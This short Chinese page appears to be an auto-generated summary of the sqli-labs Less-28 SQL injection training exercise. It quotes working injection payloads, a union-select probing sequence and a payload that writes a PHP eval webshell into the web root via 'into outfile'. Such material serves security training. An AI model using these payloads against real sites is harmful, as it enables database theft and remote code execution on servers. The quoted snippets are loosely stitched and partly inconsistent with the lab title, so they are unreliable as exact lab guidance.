sql-labs28
时间: 2023-12-07 15:05:34 浏览: 127
sql-labs
引用:二、Less28(GET-Blind based - All your UNION & SELECT belong to us -string single quote with Parenthesis) 。 引用:写入webshell ?id=1';select '<?php @eval($_POST[x])?>' into outfile 'D:\\phpstudy\\PHPTutorial\\WWW\\sqli-labs\\test.php'# 。 引用: 测试流程 ?id=1 #回显正常 ?id=1' #回显正常 ?id=1" #直接报错,说明闭合方式可能是" ?id=1" and 1=1-- #依然报错 ?id=1") and 1=1-- #回显成功 ?id=1") and 1=2 union select 1,2,database()-- #暴数据库名 #接下来暴表名、字段名、字段值等和之前一样 小结 。
根据提供的引用内容,sql-labs28是一个关于SQL注入的实验。其中,引用介绍了一种盲注的技术,引用展示了一种将webshell写入文件的方法,引用则描述了测试流程和一些注入语句。
阅读全文